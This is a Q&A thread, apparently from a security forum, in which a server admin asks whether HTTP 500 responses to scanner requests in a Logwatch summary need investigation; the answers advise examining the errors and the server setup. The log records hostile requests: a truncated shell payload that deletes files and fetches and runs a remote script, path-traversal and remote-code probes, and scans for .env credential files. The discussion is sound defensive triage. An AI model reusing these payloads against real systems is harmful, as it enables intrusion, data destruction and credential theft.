0

Logwatch shows those attacks giving a 500. Given that 500 is an internal server error, does that mean I need to examine further or dismiss?

421 (undefined)
   /: 4 Time(s)
500 Internal Server Error
   /: 1131 Time(s)
   /robots.txt: 67 Time(s)
   /.env: 11 Time(s)
   /ab2h: 4 Time(s)
   /?XDEBUG_SESSION_START=phpstorm: 3 Time(s)
   /ab2g: 3 Time(s)
   /actuator/gateway/routes: 3 Time(s)
   /actuator/health: 2 Time(s)
   /boaform/admin/formLogin: 2 Time(s)
   /owa/auth/logon.aspx: 2 Time(s)
   /solr/: 2 Time(s)
   /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 2 Time(s)
   /.DS_Store: 1 Time(s)
   /.json: 1 Time(s)
   //: 1 Time(s)
   /2018/wp-includes/wlwmanifest.xml: 1 Time(s)
   /2019/wp-includes/wlwmanifest.xml: 1 Time(s)
   /?s=/Index/\\think\\app/invokefunction&fun ... s[1][]=ymd464ye: 1 Time(s)
   /_ignition/execute-solution: 1 Time(s)
   /about.cgi: 1 Time(s)
   /admin/.env: 1 Time(s)
   /api/.env: 1 Time(s)
   /api/index/getline?id=130: 1 Time(s)
   /app/.env: 1 Time(s)
   /app/config/.env: 1 Time(s)
   /apps/.env: 1 Time(s)
   /audio/.env: 1 Time(s)
   /backend/.env: 1 Time(s)
   /base/.env: 1 Time(s)
   /blog/.env: 1 Time(s)
   /blog/wp-includes/wlwmanifest.xml: 1 Time(s)
   /cms/wp-includes/wlwmanifest.xml: 1 Time(s)
   /conf/.env: 1 Time(s)
   /config.json: 1 Time(s)
   /config/getuser?index=0: 1 Time(s)
   /core/.env: 1 Time(s)
   /crm/.env: 1 Time(s)
   /database/.env: 1 Time(s)
   /datenschutz/: 1 Time(s)
   /ecp/Current/exporttool/microsoft.exchange ... ool.application: 1 Time(s)
   /<meineip>/.env: 1 Time(s)
   /idx_config/: 1 Time(s)
   /jenkins/login: 1 Time(s)
   /laravel/.env: 1 Time(s)
   /library/.env: 1 Time(s)
   /local/.env: 1 Time(s)
   /login: 1 Time(s)
   /m/index.php?id=298: 1 Time(s)
   /m/index.php?id=590: 1 Time(s)
   /manager/html: 1 Time(s)
   /media/wp-includes/wlwmanifest.xml: 1 Time(s)
   /new/.env: 1 Time(s)
   /news/wp-includes/wlwmanifest.xml: 1 Time(s)
   /newsite/.env: 1 Time(s)
   /old/.env: 1 Time(s)
   /owa/auth/logon.aspx?url=https...: 1 Time(s)
   /owa/auth/x.js: 1 Time(s)
   /phpmyadmin/index.php: 1 Time(s)
   /protected/.env: 1 Time(s)
   /public/.env: 1 Time(s)
   /push.html: 1 Time(s)
   /remote/fgt_lang?lang=/../../../..//////// ... lvpn_websession: 1 Time(s)
   /script: 1 Time(s)
   /setup.cgi?next_file=netgear.cfg&todo=sysc ... ntsetting.htm=1: 1 Time(s)
   /shell?cd+/tmp;rm+-rf+*;wget+networkmappin ... ws;sh+/tmp/jaws: 1 Time(s)
   /shop/wp-includes/wlwmanifest.xml: 1 Time(s)
   /site/wp-includes/wlwmanifest.xml: 1 Time(s)
   /sites/all/libraries/mailchimp/.env: 1 Time(s)
   /sito/wp-includes/wlwmanifest.xml: 1 Time(s)
   /src/.env: 1 Time(s)
   /storage/.env: 1 Time(s)
   /telescope/requests: 1 Time(s)
   /test/wp-includes/wlwmanifest.xml: 1 Time(s)
   /vendor/.env: 1 Time(s)
   /vendor/laravel/.env: 1 Time(s)
   /version: 1 Time(s)
   /web/wp-includes/wlwmanifest.xml: 1 Time(s)
   /website/wp-includes/wlwmanifest.xml: 1 Time(s)
   /wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
   /wp-admin/.env: 1 Time(s)
   /wp-content/.env: 1 Time(s)
   /wp-includes/wlwmanifest.xml: 1 Time(s)
   /wp/wp-includes/wlwmanifest.xml: 1 Time(s)
   /wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
   /wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
   /www/.env: 1 Time(s)
   host64.ru:443: 1 Time(s)
   http://<meineip>:80/mysql/scripts/setup.php: 1 Time(s)
   http://<meineip>:80/pma/scripts/setup.php: 1 Time(s)
   http://host64.ru/rb/getip.php?Z76yxcyxc: 1 Time(s)
   mkzaim.ru:443: 1 Time(s)
Improve this question
1
  • You call these “attacks”. No, it’s just an attempt to access something. For example the .DS_STORE which means a Mac is trying to access a directory and wants to know where to display file icons. robots.txt is an attempt to be nice. The one with multiple /.. is highly suspicious.
    – gnasher729
    Commented Mar 1, 2023 at 11:55

2 Answers 2

Reset to default
1

5xx errors mean your backend/software/app has misbehaved/crashed.

Yes, you should investigate and solve those issues 100% of the time.

Those errors should never happen in well designed systems (that is the design goal). Anything less means your systems might have compromising vulnerabilities.

If I can get your app/service/backend to generate 5xx errors, that is a form of denial of service. That can be a serious problem. Often 5xx errors are the result of software exceptions (the language feature). Those types of errors are CPU intensive, result in process restarts, fill/consume application logs, disk space and/or network bandwidth, and more possibilities.

Sometimes 5xx errors are the result of overloaded systems, failed networking, out of resource issues, etc.

You will not know unless you investigate. Always perform postmortem analysis.

Improve this answer
0

Given that 500 is an internal server error, does that mean I need to examine further or dismiss?

Yes and no. This error is too generic. It might be the default reaction of your server or it might be a sign of a larger problem.

You need to study your specific server configuration to find out all the cases in which the error might be triggered and to determine if this a problem. While doing this it might be useful to change the setup of your server to give more meaningful responses (like 404 not found etc) in most of these situations, so that analyzing the logs will get easier for you in the future.

Improve this answer
2
  • How can this process be automated?
    – Zurechtweiser
    Commented Oct 1, 2022 at 11:43
  • 1
    @Zurechtweiser: There is no automation possible based on the given information - which basically consist only of the logs but of no information about server and setup. The errors can come from anywhere - server configuration, reverse proxies backend ... . Before being able to automate anything you first need to understand your setup. Also, please stick with English in your comments so that others can understand these too.
    – Steffen Ullrich
    Commented Oct 1, 2022 at 11:57

You must log in to answer this question.

Not the answer you're looking for? Browse other questions tagged .